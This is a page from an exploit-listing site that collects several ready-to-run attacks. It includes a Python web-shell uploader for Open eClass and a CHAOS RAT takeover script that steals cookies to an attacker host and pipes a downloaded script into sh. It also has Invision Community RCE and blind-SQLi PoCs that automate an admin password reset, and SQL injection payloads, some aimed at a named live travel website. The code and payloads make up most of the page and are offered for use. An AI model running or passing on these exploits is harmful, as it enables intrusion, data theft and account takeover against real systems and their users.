Latest exploits :: CodePwn

<pre><code>import requests import argparse import zipfile import os import sys RED = '\033[91m' GREEN = '\033[92m' YELLOW = '\033[93m' RESET = '\033[0m' ORANGE = '\033[38;5;208m' MALICIOUS_PAYLOAD = """\ <?php if(isset($_REQUEST['cmd'])){ $cmd = ($_REQUEST['cmd']); system($cmd); die; } ?> """ def banner(): print(f'''{RED} {YELLOW} ============================ Author: Frey ============================ {RESET}''') def execute_command(openeclass, filename): while True: # Prompt for user input with "eclass" cmd = input(f"{RED}[{YELLOW}eClass{RED}]~# {RESET}") # Check if the command is 'quit', then break the loop if cmd.lower() == "quit": print(f"{ORANGE}\nExiting...{RESET}") clean_server(openeclass) sys.exit() # Construct the URL with the user-provided command url = f"{openeclass}/courses/user_progress_data/cert_templates/{filename}?cmd={cmd}" # Execute the GET request try: response = requests.get(url) # Check if the request was successful if response.status_code == 200: # Print the response text print(f"{GREEN}{response.text}{RESET}") except requests.exceptions.RequestException as e: # Print any error that occurs during the request print(f"{RED}An error occurred: {e}{RESET}") def upload_web_shell(openeclass, username, password): login_url = f'{openeclass}/?login_page=1' login_page_url = f'{openeclass}/main/login_form.php?next=%2Fmain%2Fportfolio.php' # Login credentials payload = { 'next': '/main/portfolio.php', 'uname': f'{username}', 'pass': f'{password}', 'submit': 'Enter' } headers = { 'Referer': login_page_url, } # Use a session to ensure cookies are handled correctly with requests.Session() as session: # (Optional) Initially visit the login page if needed to get a fresh session cookie or any other required tokens session.get(login_page_url) # Post the login credentials response = session.post(login_url, headers=headers, data=payload) # Create a zip file containing the malicious payload zip_file_path = 'malicious_payload.zip' with zipfile.ZipFile(zip_file_path, 'w') as zipf: zipf.writestr('evil.php', MALICIOUS_PAYLOAD.encode()) # Upload the zip file url = f'{openeclass}/modules/admin/certbadge.php?action=add_cert' files = { 'filename': ('evil.zip', open(zip_file_path, 'rb'), 'application/zip'), 'certhtmlfile': (None, ''), 'orientation': (None, 'L'), 'description': (None, ''), 'cert_id': (None, ''), 'submit_cert_template': (None, '') } response = session.post(url, files=files) # Clean up the zip file os.remove(zip_file_path) # Check if the upload was successful if response.status_code == 200: print(f"{GREEN}Payload uploaded successfully!{RESET}") return True else: print(f"{RED}Failed to upload payload. Exiting...{RESET}") return False def clean_server(openeclass): print(f"{ORANGE}Cleaning server...{RESET}") # Remove the uploaded files requests.get(f"{openeclass}/courses/user_progress_data/cert_templates/evil.php?cmd=rm%20evil.zip") requests.get(f"{openeclass}/courses/user_progress_data/cert_templates/evil.php?cmd=rm%20evil.php") print(f"{GREEN}Server cleaned successfully!{RESET}") def main(): parser = argparse.ArgumentParser(description="Open eClass – CVE-CVE-2024-31777: Unrestricted File Upload Leads to Remote Code Execution") parser.add_argument('-u', '--username', required=True, help="Username for login") parser.add_argument('-p', '--password', required=True, help="Password for login") parser.add_argument('-e', '--eclass', required=True, help="Base URL of the Open eClass") args = parser.parse_args() banner() # Running the main login and execute command function if upload_web_shell(args.eclass, args.username, args.password): execute_command(args.eclass, 'evil.php') if __name__ == "__main__": main() </code></pre>

<pre><code># Exploit Title: CHAOS RAT v5.0.1 RCE # Date: 2024-04-05 # Exploit Author: @_chebuya # Software Link: https://github.com/tiagorlampert/CHAOS # Version: v5.0.1 # Tested on: Ubuntu 20.04 LTS # CVE: CVE-2024-30850, CVE-2024-31839 # Description: The CHAOS RAT web panel is vulnerable to command injection, which can be triggered from an XSS, allowing an attacker to takeover the RAT server # Github: https://github.com/chebuya/CVE-2024-30850-chaos-rat-rce-poc # Blog: https://blog.chebuya.com/posts/remote-code-execution-on-chaos-rat-via-spoofed-agents/ import time import requests import threading import json import websocket import http.client import argparse import sys import re from functools import partial from http.server import BaseHTTPRequestHandler, HTTPServer class Collector(BaseHTTPRequestHandler): def __init__(self, ip, port, target, command, video_name, *args, **kwargs): self.ip = ip self.port = port self.target = target self.shell_command = command self.video_name = video_name super().__init__(*args, **kwargs) def do_GET(self): if self.path == "/loader.sh": self.send_response(200) self.end_headers() command = str.encode(self.shell_command) self.wfile.write(command) elif self.path == "/video.mp4": with open(self.video_name, 'rb') as f: self.send_response(200) self.send_header('Content-type', 'video/mp4') self.end_headers() self.wfile.write(f.read()) else: cookie = self.path.split("=")[1] self.send_response(200) self.end_headers() self.wfile.write(b"") background_thread = threading.Thread(target=run_exploit, args=(cookie, self.target, self.ip, self.port)) background_thread.start() def convert_to_int_array(string): int_array = [] for char in string: int_array.append(ord(char)) return int_array def extract_client_info(path): with open(path, 'rb') as f: data = str(f.read()) address_regexp = r"main\.ServerAddress=(?:[0-9]{1,3}\.){3}[0-9]{1,3}" address_pattern = re.compile(address_regexp) address = address_pattern.findall(data)[0].split("=")[1] port_regexp = r"main\.Port=\d{1,6}" port_pattern = re.compile(port_regexp) port = port_pattern.findall(data)[0].split("=")[1] jwt_regexp = r"main\.Token=[a-zA-Z0-9_\.\-+/=]*\.[a-zA-Z0-9_\.\-+/=]*\.[a-zA-Z0-9_\.\-+/=]*" jwt_pattern = re.compile(jwt_regexp) jwt = jwt_pattern.findall(data)[0].split("=")[1] return f"{address}:{port}", jwt def keep_connection(target, cookie, hostname, username, os_name, mac, ip): print("Spoofing agent connection") headers = { "Cookie": f"jwt={cookie}" } while True: data = {"hostname": hostname, "username":username,"user_id": username,"os_name": os_name, "os_arch":"amd64", "mac_address": mac, "local_ip_address": ip, "port":"8000", "fetched_unix":int(time.time())} r = requests.get(f"http://{target}/health", headers=headers) r = requests.post(f"http://{target}/device", headers=headers, json=data) time.sleep(30) def handle_command(target, cookie, mac, ip, port): print("Waiting to serve malicious command outupt") headers = { "Cookie": f"jwt={cookie}", "X-Client": mac } ws = websocket.WebSocket() ws.connect(f'ws://{target}/client', header=headers) while True: response = ws.recv() command = json.loads(response)['command'] data = {"client_id": mac, "response": convert_to_int_array(f"</pre><script>var i = new Image;i.src='http://{ip}:{port}/'+document.cookie;</script><video loop controls autoplay><source src=\"http://{ip}:{port}/video.mp4\" type=\"video/mp4\"></video>"), "has_error": False} ws.send_binary(json.dumps(data)) def run_exploit(cookie, target, ip, port): print(f"Exploiting {target} with JWT {cookie}") conn = http.client.HTTPConnection(target) headers = { 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0', 'Content-Type': 'multipart/form-data; boundary=---------------------------196428912119225031262745068932', 'Cookie': f'jwt={cookie}' } conn.request( 'POST', '/generate', f'-----------------------------196428912119225031262745068932\r\nContent-Disposition: form-data; name="address"\r\n\r\nhttp://localhost\'$(IFS=];b=curl]{ip}:{port}/loader.sh;$b|sh)\'\r\n-----------------------------196428912119225031262745068932\r\nContent-Disposition: form-data; name="port"\r\n\r\n8080\r\n-----------------------------196428912119225031262745068932\r\nContent-Disposition: form-data; name="os_target"\r\n\r\n1\r\n-----------------------------196428912119225031262745068932\r\nContent-Disposition: form-data; name="filename"\r\n\r\n\r\n-----------------------------196428912119225031262745068932\r\nContent-Disposition: form-data; name="run_hidden"\r\n\r\nfalse\r\n-----------------------------196428912119225031262745068932--\r\n', headers ) def run(ip, port, target, command, video_name): server_address = (ip, int(port)) collector = partial(Collector, ip, port, target, command, video_name) httpd = HTTPServer(server_address, collector) print(f'Server running on port {ip}:{port}') httpd.serve_forever() if __name__ == "__main__": parser = argparse.ArgumentParser() subparsers = parser.add_subparsers(dest="option") exploit = subparsers.add_parser("exploit") exploit.add_argument("-f", "--file", help="The path to the CHAOS client") exploit.add_argument("-t", "--target", help="The url of the CHAOS server (127.0.0.1:8080)") exploit.add_argument("-c", "--command", help="The command to use", default=r"find / -name chaos.db -exec rm -f {} \;") exploit.add_argument("-v", "--video-name", help="The video name to use", default="rickroll.mp4") exploit.add_argument("-j", "--jwt", help="The JWT token to use") exploit.add_argument("-l", "--local-ip", help="The local IP to use for serving bash script and mp4", required=True) exploit.add_argument("-p", "--local-port", help="The local port to use for serving bash script and mp4", default=8000) exploit.add_argument("-H", "--hostname", help="The hostname to use for the spoofed client", default="DC01") exploit.add_argument("-u", "--username", help="The username to use for the spoofed client", default="Administrator") exploit.add_argument("-o", "--os", help="The OS to use for the spoofed client", default="Windows") exploit.add_argument("-m", "--mac", help="The MAC address to use for the spoofed client", default="3f:72:58:91:56:56") exploit.add_argument("-i", "--ip", help="The IP address to use for the spoofed client", default="10.0.17.12") extract = subparsers.add_parser("extract") extract.add_argument("-f", "--file", help="The path to the CHAOS client", required=True) args = parser.parse_args() if args.option == "exploit": if args.target != None and args.jwt != None: target = args.target jwt = args.jwt elif args.file != None: target, jwt = extract_client_info(args.file) else: exploit.print_help(sys.stderr) sys.exit(1) bg = threading.Thread(target=keep_connection, args=(target, jwt, args.hostname, args.username, args.os, args.mac, args.ip)) bg.start() cmd = threading.Thread(target=handle_command, args=(target, jwt, args.mac, args.local_ip, args.local_port)) cmd.start() server = threading.Thread(target=run, args=(args.local_ip, args.local_port, target, args.command, args.video_name)) server.start() elif args.option == "extract": target, jwt = extract_client_info(args.file) print(f"CHAOS server: {target}\nJWT: {jwt}") else: parser.print_help(sys.stderr) sys.exit(1) </code></pre>

<pre><code>==================================================================================================================================== | # Title : SP Page Builder 5.2.7 Sql injection Vulnerability | | # Author : indoushka | | # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 69.0(32-bit) | | # Vendor : https://extensions.joomla.org/extension/sp-page-builder/ | ==================================================================================================================================== poc : [+] Dorking İn Google Or Other Search Enggine. [+] use payload : /index.php?option=com_sppagebuilder&view=page&id=22&Itemid=251 <===== inject here [+] http://127.0.0.1/cdgi36fr/index.php?option=com_sppagebuilder&view=page&id=22&Itemid=251 Greetings to :================================================================= jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R | =============================================================================== </code></pre>

<pre><code> This site which has a security problem with the SQL INJECTION Vulnerability "CWE-89". We have repeatedly reported to this site that it has a security problem and has ignored our report. We want to record this security issue ######################################################################################################################### # # # Exploit Title : Site Flight agency airpol the Islamic Republic of Iran SQL INJECTION Vulnerability # # # # Author : E1.Coders # # # # Contact : E1.Coders [at] Mail [dot] RU # # # # Portal Link : https://flightio.com/ # # # # Security Risk : Medium # # # # Description : All target's IRanian AIRPOT websites # # # # DorK : "inurl:wp-comments-post.php%5Eauthor=" # # # ######################################################################################################################### # # # Expl0iTs: # # # vuln type : SQLInjection # # refer address : https://flightio.com/blog/attractions/best-chahbahar-attractions/ # # request type : POST # # action url : https://flightio.com/blog/wp-comments-post.php^author=6463106&submit=ارسال دیدگاه&comment_post_ID=64505&akismet_comment_nonce=385c7c306e&ak_js=98&comment=WCRTEXTAREATESTINPUT8462957&ak_hp_textarea=WCRTEXTAREATESTINPUT2557057&comment_parent=0 # # parameter : comment_parent # # description : POST SQL INJECTION BooleanBased String # # POC : https://flightio.com/blog/wp-comments-post.php^author=6463106&submit=ارسال/**/دیدگاه&comment_post_ID=64505&akismet_comment_nonce=385c7c306e&ak_js=98&comment=WCRTEXTAREATESTINPUT8462957&ak_hp_textarea=WCRTEXTAREATESTINPUT2557057&comment_parent=0%27/**/aNd/**/7462200=7462200/**/aNd/**/%276199%27=%276199 --------------------------------------- # # Expl0iTs: # vuln type : SQLInjection # # refer address : https://flightio.com/blog/travel-tips/norouz-holiday-trips-in-iran/ # # request type : POST # # action url : https://flightio.com/blog/wp-comments-post.php^author=9640811&submit=ارسال دیدگاه&comment_post_ID=3173&comment_parent=0&akismet_comment_nonce=709cdb3e84&ak_js=154&comment=WCRTEXTAREATESTINPUT9791191&ak_hp_textarea=WCRTEXTAREATESTINPUT8111319 # # parameter : ak_hp_textarea # # description : POST SQL INJECTION BooleanBased String # # POC : https://flightio.com/blog/wp-comments-post.php^author=9640811&submit=ارسال/**/دیدگاه&comment_post_ID=3173&comment_parent=0&akismet_comment_nonce=709cdb3e84&ak_js=154&comment=WCRTEXTAREATESTINPUT9791191&ak_hp_textarea=WCRTEXTAREATESTINPUT8111319%27)/**/aNd/**/4442431=4442431/**/aNd/**/(%276199%27)=(%276199 ------------------------------------------------ # # Expl0iTs: # vuln type : SQLInjection # # refer address : https://flightio.com/blog/travel-tips/hormuz-island-travel-guide/ # # request type : POST # # action url : https://flightio.com/blog/wp-comments-post.php^submit=ارسال دیدگاه&comment_post_ID=64267&comment_parent=0&akismet_comment_nonce=57b7866a2c&ak_js=15&comment=WCRTEXTAREATESTINPUT9752286&ak_hp_textarea=WCRTEXTAREATESTINPUT5571116&author=99999999 # # parameter : author # # description : POST SQL INJECTION BooleanBased String # # POC : https://flightio.com/blog/wp-comments-post.php^submit=ارسال/**/دیدگاه&comment_post_ID=64267&comment_parent=0&akismet_comment_nonce=57b7866a2c&ak_js=15&comment=WCRTEXTAREATESTINPUT9752286&ak_hp_textarea=WCRTEXTAREATESTINPUT5571116&author=99999999%27)/**/oR/**/6197419=6197419/**/aNd/**/(%276199%27)=(%276199 # ######################################################################################################################### # # # | Security Is JOCK | # # # # | Russian Black Hat | # # # ######################################################################################################################### Exploit PHP : global $wpdb; $author = '99999999'; $comment = 'WCRTEXTAREATESTINPUT9752286'; $ak_hp_textarea = 'WCRTEXTAREATESTINPUT5571116'; $wpdb->prepare( "INSERT INTO wp_comments (comment_post_ID, comment_author, comment_content, comment_parent, akismet_comment_nonce, ak_js, author) VALUES (%d, %s, %s, %d, %s, %d, %d)", $comment_post_ID, $comment_author, $comment_content, $comment_parent, $akismet_comment_nonce, $ak_js, $author ); $wpdb->insert('wp_comments', array( 'comment_post_ID' => $comment_post_ID, 'comment_author' => $comment_author, 'comment_content' => $comment_content, 'comment_parent' => $comment_parent, 'akismet_comment_nonce' => $akismet_comment_nonce, 'ak_js' => $ak_js, 'author' => $author )); </code></pre>

<pre><code>------------------------------------------------------------------------------ Invision Community <= 4.7.16 (toolbar.php) Remote Code Execution Vulnerability ------------------------------------------------------------------------------ [-] Software Link: https://invisioncommunity.com [-] Affected Versions: Version 4.7.16 and prior versions. [-] Vulnerability Description: The vulnerability is located in the /applications/core/modules/admin/editor/toolbar.php script. Specifically, into the IPS\core\modules\admin\editor\_toolbar::addPlugin() method, which will handle the upload of a ZIP file, trying to extract its content into the /applications/core/interface/ckeditor/ckeditor/plugins/ directory; if the ZIP archive does not include a plugin.js file, then the extracted ZIP content will be recursively deleted from the file system, otherwise it will stay there. This can be exploited to execute arbitrary PHP code by uploading a ZIP archive containing a plugin.js file (which can also be empty) along with a PHP file. Successful exploitation of this vulnerability requires an Administrator account having the "toolbar_manage" permission. [-] Proof of Concept: https://karmainsecurity.com/pocs/CVE-2024-30162.php [-] Solution: No official solution is currently available. [-] Disclosure Timeline: [08/01/2024] - Vulnerability details sent to SSD Secure Disclosure [12/03/2024] - Version 4.7.16 released, but the issue is still not fixed [20/03/2024] - CVE identifier requested [24/03/2024] - CVE identifier assigned [05/04/2024] - Coordinated public disclosure [-] CVE Reference: The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the name CVE-2024-30162 to this vulnerability. [-] Credits: Vulnerability discovered by Egidio Romano. [-] Other References: https://ssd-disclosure.com/ssd-advisory-ip-board-nexus-rce-and-blind-sqli/ [-] Original Advisory: http://karmainsecurity.com/KIS-2024-03 ----------------------- PoC: <?php /* ------------------------------------------------------------------------------ Invision Community <= 4.7.16 (toolbar.php) Remote Code Execution Vulnerability ------------------------------------------------------------------------------ author..............: Egidio Romano aka EgiX mail................: n0b0d13s[at]gmail[dot]com software link.......: https://invisioncommunity.com +-------------------------------------------------------------------------+ | This proof of concept code was written for educational purpose only. | | Use it at your own risk. Author will be not responsible for any damage. | +-------------------------------------------------------------------------+ [-] Vulnerability Description: The vulnerability is located in the /applications/core/modules/admin/editor/toolbar.php script. Specifically, into the IPS\core\modules\admin\editor\_toolbar::addPlugin() method, which will handle the upload of a ZIP file, trying to extract its content into the /applications/core/interface/ckeditor/ckeditor/plugins/ directory; if the ZIP archive does not include a plugin.js file, then the extracted ZIP content will be recursively deleted from the file system, otherwise it will stay there. This can be exploited to execute arbitrary PHP code by uploading a ZIP archive containing a plugin.js file (which can also be empty) along with a PHP file. Successful exploitation of this vulnerability requires an Administrator account having the "toolbar_manage" permission. [-] Original Advisory: https://karmainsecurity.com/KIS-2024-03 */ set_time_limit(0); error_reporting(E_ERROR); if (!extension_loaded("curl")) die("[-] cURL extension required!\n"); if ($argc != 4) die("\nUsage: php $argv[0] <URL> <Email> <Password>\n\n"); $url = $argv[1]; $email = $argv[2]; $passwd = $argv[3]; $ch = curl_init(); @unlink('./cookies.txt'); curl_setopt($ch, CURLOPT_HEADER, true); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); curl_setopt($ch, CURLOPT_COOKIEJAR, './cookies.txt'); curl_setopt($ch, CURLOPT_COOKIEFILE, './cookies.txt'); print "[+] Logging into AdminCP\n"; curl_setopt($ch, CURLOPT_URL, "{$url}admin/?app=core&module=system&controller=login"); curl_setopt($ch, CURLOPT_POST, false); if (!preg_match('/csrfKey: "([^"]+)"/i', curl_exec($ch), $csrf)) die("[-] CSRF token not found!\n"); curl_setopt($ch, CURLOPT_POSTFIELDS, "csrfKey={$csrf[1]}&auth=".urlencode($email)."&password={$passwd}&_processLogin=usernamepassword"); if (!preg_match("/303 See Other/i", curl_exec($ch))) die("[-] Login failed!\n"); print "[+] Uploading malicious ZIP file\n"; curl_setopt($ch, CURLOPT_URL, "{$url}admin/?app=core&module=editor&controller=toolbar&do=addPlugin"); curl_setopt($ch, CURLOPT_POST, false); if (!preg_match('/csrfKey: "([^"]+)"/i', curl_exec($ch), $csrf)) die("[-] CSRF token not found!\n"); $plg = md5(time()).".zip"; @file_put_contents("rce.zip", base64_decode("UEsDBAoDAAAAADxvKFgecSjnMgAAADIAAAAJAAAAaW5kZXgucGhwPD9waHAgZXZhbChiYXNlNjRfZGVjb2RlKCRfU0VSVkVSWydIVFRQX0MnXSkpOyA/PgpQSwMECgMAAAAAQG8oWAAAAAAAAAAAAAAAAAkAAABwbHVnaW4uanNQSwECPwMKAwAAAAA8byhYHnEo5zIAAAAyAAAACQAkAAAAAAAAACCAtIEAAAAAaW5kZXgucGhwCgAgAAAAAAABABgAgMvlSzJC2gGAy+VLMkLaAYDL5UsyQtoBUEsBAj8DCgMAAAAAQG8oWAAAAAAAAAAAAAAAAAkAJAAAAAAAAAAggLSBWQAAAHBsdWdpbi5qcwoAIAAAAAAAAQAYAAC84E4yQtoBALzgTjJC2gEAvOBOMkLaAVBLBQYAAAAAAgACALYAAACAAAAAAAA=")); $params = ["csrfKey" => $csrf[1], "form_submitted" => 1, "editor_plugin_zip_noscript[]" => new CURLFile("rce.zip", "", $plg)]; curl_setopt($ch, CURLOPT_POSTFIELDS, $params); if (!preg_match("/301 Moved Permanently/i", curl_exec($ch))) die("[-] Upload failed!\n"); print "[+] Launching shell\n"; curl_setopt($ch, CURLOPT_URL, "{$url}applications/core/interface/ckeditor/ckeditor/plugins/{$plg}/"); curl_setopt($ch, CURLOPT_POST, false); $phpcode = "print '____'; passthru(base64_decode('%s')); print '____';"; while(1) { print "\ninvision-shell# "; if (($cmd = trim(fgets(STDIN))) == "exit") break; curl_setopt($ch, CURLOPT_HTTPHEADER, ["C: ".base64_encode(sprintf($phpcode, base64_encode($cmd)))]); preg_match('/____(.*)____/s', curl_exec($ch), $m) ? print $m[1] : die("\n[-] Exploit failed!\n"); } </code></pre>

<pre><code>-------------------------------------------------------------------- Invision Community <= 4.7.15 (store.php) SQL Injection Vulnerability -------------------------------------------------------------------- [-] Software Link: https://invisioncommunity.com [-] Affected Versions: All versions from 4.4.0 to 4.7.15. [-] Vulnerability Description: The vulnerability is located in the /applications/nexus/modules/front/store/store.php script. Specifically, into the IPS\nexus\modules\front\store\_store::_categoryView() method: 126 /* Apply Filters */ 127 if ( isset( \IPS\Request::i()->filter ) and \is_array( \IPS\Request::i()->filter ) ) 128 { 129 $url = $url->setQueryString( 'filter', \IPS\Request::i()->filter ); 130 foreach ( \IPS\Request::i()->filter as $filterId => $allowedValues ) 131 { 132 $where[] = array( \IPS\Db::i()->findInSet( "filter{$filterId}.pfm_values", array_map( 'intval', explode( ',', $allowedValues ) ) ) ); 133 $joins[] = array( 'table' => array( 'nexus_package_filters_map', "filter{$filterId}" ), 'on' => array( "filter{$filterId}.pfm_package=p_id AND filter{$filterId}.pfm_filter=?", $filterId ) ); 134 } 135 } User input passed through the "filter" request parameter is not properly sanitized before being assigned to the $where and $joins variables (lines 132 and 133), which are later used to execute some SQL queries. This can be exploited by unauthenticated attackers to carry out time-based or error-based Blind SQL Injection attacks. Subsequently, this might also be exploited to reset users' passwords and gain unauthorized access to the AdminCP, in order to achieve Remote Code Execution (RCE). Successful exploitation of this vulnerability requires the nexus application to be installed and configured with one "Product Group" at least. [-] Proof of Concept: https://karmainsecurity.com/pocs/CVE-2024-30163.php [-] Solution: Upgrade to version 4.7.16 or later. [-] Disclosure Timeline: [08/01/2024] - Vulnerability details sent to SSD Secure Disclosure [12/03/2024] - Version 4.7.16 released [20/03/2024] - CVE identifier requested [24/03/2024] - CVE identifier assigned [05/04/2024] - Coordinated public disclosure [-] CVE Reference: The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the name CVE-2024-30163 to this vulnerability. [-] Credits: Vulnerability discovered by Egidio Romano. [-] Other References: https://invisioncommunity.com/release-notes/4716-r128/ https://ssd-disclosure.com/ssd-advisory-ip-board-nexus-rce-and-blind-sqli/ [-] Original Advisory: http://karmainsecurity.com/KIS-2024-02 ----------------------- PoC: <?php /* -------------------------------------------------------------------- Invision Community <= 4.7.15 (store.php) SQL Injection Vulnerability -------------------------------------------------------------------- author..............: Egidio Romano aka EgiX mail................: n0b0d13s[at]gmail[dot]com software link.......: https://invisioncommunity.com +-------------------------------------------------------------------------+ | This proof of concept code was written for educational purpose only. | | Use it at your own risk. Author will be not responsible for any damage. | +-------------------------------------------------------------------------+ [-] Vulnerability Description: The vulnerability is located in the /applications/nexus/modules/front/store/store.php script. Specifically, into the IPS\nexus\modules\front\store\_store::_categoryView() method: user input passed through the "filter" request parameter is not properly sanitized before being assigned to the $where and $joins variables, which are later used to execute some SQL queries. This can be exploited by unauthenticated attackers to carry out time-based or error-based SQL Injection attacks. [-] Original Advisory: https://karmainsecurity.com/KIS-2024-02 */ set_time_limit(0); error_reporting(E_ERROR); if (!extension_loaded("curl")) die("[-] cURL extension required!\n"); if ($argc != 2) die("\nUsage: php $argv[0] <URL>\n\n"); $url = $argv[1]; $ch = curl_init(); $sec = 3; // number of seconds for SLEEP(): less seconds, less accurate curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); curl_setopt($ch, CURLOPT_URL, "{$url}index.php?/store/"); function sql_injection($sql) { global $ch, $sec; $min = true; $idx = 1; while(1) { $test = 256; for ($i = 7; $i >= 0; $i--) { $test = $min ? ($test - pow(2, $i)) : ($test + pow(2, $i)); $injection = "` ON 1 UNION SELECT IF(ORD(SUBSTR(({$sql}),{$idx},1))<{$test},1,SLEEP({$sec})) OR ?=?#"; curl_setopt($ch, CURLOPT_POSTFIELDS, sprintf("cat=1&filter[%s]=1", rawurlencode($injection))); $start = time(); curl_exec($ch); $secs = time() - $start; $min = ($secs < $sec); } if (($chr = $min ? ($test - 1) : ($test)) == 0) break; $data .= chr($chr); $min = true; $idx++; print "\r[*] Data: {$data}"; } return $data; } print "[+] Step 1: fetching admin's e-mail address\n"; $email = sql_injection("SELECT email FROM core_members WHERE member_id=1"); print "\n[+] Step 2: go to {$url}index.php?/lostpassword/ and request a password reset by using the above e-mail. When you're done press enter."; fgets(STDIN); print "[+] Step 3: fetching the password reset key\n"; $vid = sql_injection("SELECT vid FROM core_validating WHERE member_id=1 AND lost_pass=1 ORDER BY entry_date DESC LIMIT 1"); print "\n[+] Step 4: taking over the admin account by resetting their password\n"; @unlink('./cookies.txt'); curl_setopt($ch, CURLOPT_URL, "{$url}index.php?/lostpassword/"); curl_setopt($ch, CURLOPT_POST, false); curl_setopt($ch, CURLOPT_HEADER, true); curl_setopt($ch, CURLOPT_COOKIEJAR, './cookies.txt'); curl_setopt($ch, CURLOPT_COOKIEFILE, './cookies.txt'); if (!preg_match('/csrfKey: "([^"]+)"/i', curl_exec($ch), $csrf)) die("[-] CSRF token not found!\n"); $passwd = md5(time()); $params = "do=validate&vid={$vid}&mid=1&password={$passwd}&password_confirm={$passwd}&resetpass_submitted=1&csrfKey={$csrf[1]}"; curl_setopt($ch, CURLOPT_POSTFIELDS, $params); if (!preg_match("/301 Moved Permanently/i", curl_exec($ch))) die("[-] Attack failed!\n"); print "[+] Done! You can log into the AdminCP with {$email}:{$passwd}\n"; </code></pre>

<pre><code>## Title: upresult_0.1-2024 Multiple-SQLi ## Author: nu11secur1ty ## Date: 04/08/2024 ## Vendor: https://www.mayurik.com/ ## Software: https://www.sourcecodester.com/php/15653/best-student-result-management-system-project-source-code-php-and-mysql-free-download ## Reference: https://portswigger.net/web-security/sql-injection ## Description: The nid parameter appears to be vulnerable to SQL injection attacks. The payload '+(select load_file('\\\\qiccs55u6nnh6lxma520zou8ozusijm7da11orcg.tupaputka.com\\tuh'))+' was submitted in the nid parameter. This payload injects a SQL sub-query that calls MySQL's load_file function with a UNC file path that references a URL on an external domain. The application interacted with that domain, indicating that the injected SQL query was executed. The attacker can get all information from the system by using this vulnerability! STATUS: HIGH- Vulnerability [+]Payload: ```mysql --- Parameter: nid (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: nid=145448807' or '1766'='1766' AND 2997=2997 AND 'IBFU'='IBFU Type: stacked queries Title: MySQL >= 5.0.12 stacked queries (comment) Payload: nid=145448807' or '1766'='1766';SELECT SLEEP(7)# Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: nid=145448807' or '1766'='1766' AND (SELECT 3474 FROM (SELECT(SLEEP(7)))eAdm) AND 'ubZR'='ubZR Type: UNION query Title: MySQL UNION query (NULL) - 4 columns Payload: nid=145448807' or '1766'='1766' UNION ALL SELECT NULL,NULL,CONCAT(0x716a767871,0x76504a4f6455624669506c6a484150727767554e66574d7856554875684368426b4f72794374496e,0x716b787071),NULL# --- ``` ## Reproduce: [href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/mayuri_k/2024/upresult_0.1-2024) ## Proof and Exploit: [href](https://www.nu11secur1ty.com/2024/04/upresult01-2024-multiple-sqli.html) ## Time spent: 00:15:00 </code></pre>